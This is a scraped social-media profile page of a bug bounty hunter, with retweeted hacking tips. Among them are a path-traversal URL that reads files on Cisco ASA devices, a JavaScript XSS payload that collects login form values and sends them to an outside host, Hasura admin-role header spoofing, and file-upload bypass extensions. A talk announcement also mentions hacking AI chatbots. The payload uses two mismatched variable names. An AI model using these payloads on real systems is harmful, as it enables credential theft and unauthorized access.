Hossam Sec

2.8K posts

Hossam Sec banner
Hossam Sec

Hossam Sec

@HossamSec

| Bug Bounty Hunter | | programmer |

🚩 Katılım Temmuz 2018
1.5K Takip Edilen2.3K Takipçiler
Hossam Sec retweetledi
Godfather Orwa 🇯🇴
Godfather Orwa 🇯🇴@GodfatherOrwa·
Iam in India with @StandoffBB team Behold for the talk in 13/SEP in @bsidesahmedabad With a so interesting topics I will talk about 1 sourcegraph dorking 2IDORS /BAC via authorize burp Ext 3 with &without AI 4 AI chatbot hacking 5 Prompt from AI to other AI (Build your method in UI) 6 VirusTotal V2 scrip 7 #bugbountytip #bugbountytips a lot of tips #bugbounty
Godfather Orwa 🇯🇴 tweet media
English
15
9
188
10.5K
Ali Tütüncü
Ali Tütüncü@alicanact60·
Don't forget to check the responses. Maybe you can find some tokens like email/account confirmation token. I found a token in response and went to mailbox. The email verification link was xx+.com/verify?token={Token}. And I saw they are same tokens! #BugBountyTips #BugBountyTip
Ali Tütüncü tweet media
English
9
47
245
0
Hossam Sec retweetledi
Hugo Picanzo
Hugo Picanzo@hugopicanzo·
Im curious... #bugbounty hunters out there... whats your age?
English
130
7
106
0
Hossam Sec retweetledi
Sapra
Sapra@0xsapra·
Extension list for File upload bugs ASP: ".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", "shtml" PHP: php, php5, php3, php2, shtml, html, .php.png(double extension attack)
English
9
216
527
0
Hossam Sec retweetledi
Ahmed Aboul-Ela
Ahmed Aboul-Ela@aboul3la·
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!
Ahmed Aboul-Ela tweet media
English
37
691
1.5K
0
Threat Intel Center
Threat Intel Center@threatintelctr·
🚨 NEW: CVE-2020-12640 🚨 Roundcube Webmail before 1.4.4 allows attackers to include local files and execute code via directory traversal in a plugin name to rcube_plugin_api.php. Severity: CRITICAL github.com/roundcube/roun…
English
2
10
25
0
Hossam Sec retweetledi
spidersec
spidersec@SpiderSec·
Interesting Hasura GraphQL Framework Access Control Issue. Found an authenticated endpoint "/script" Added two headers to the existing request: X-Hasura-Role: admin X-Hasura-User-Id: 0 Was able to query as admin 😀
English
1
98
239
0
Hossam Sec retweetledi
xhzeem
xhzeem@xhzeem·
When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them 😉 PoC: javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inputs[i].value};location.href='https://xhze.em/?'+info #bugbountytip
English
2
109
272
0
pyn3rd
pyn3rd@pyn3rd·
Apache Zeppelin pop-up Calculator
pyn3rd tweet media
English
6
21
113
0
Nate
Nate@nnwakelam·
Nate tweet media
ZXX
3
10
57
0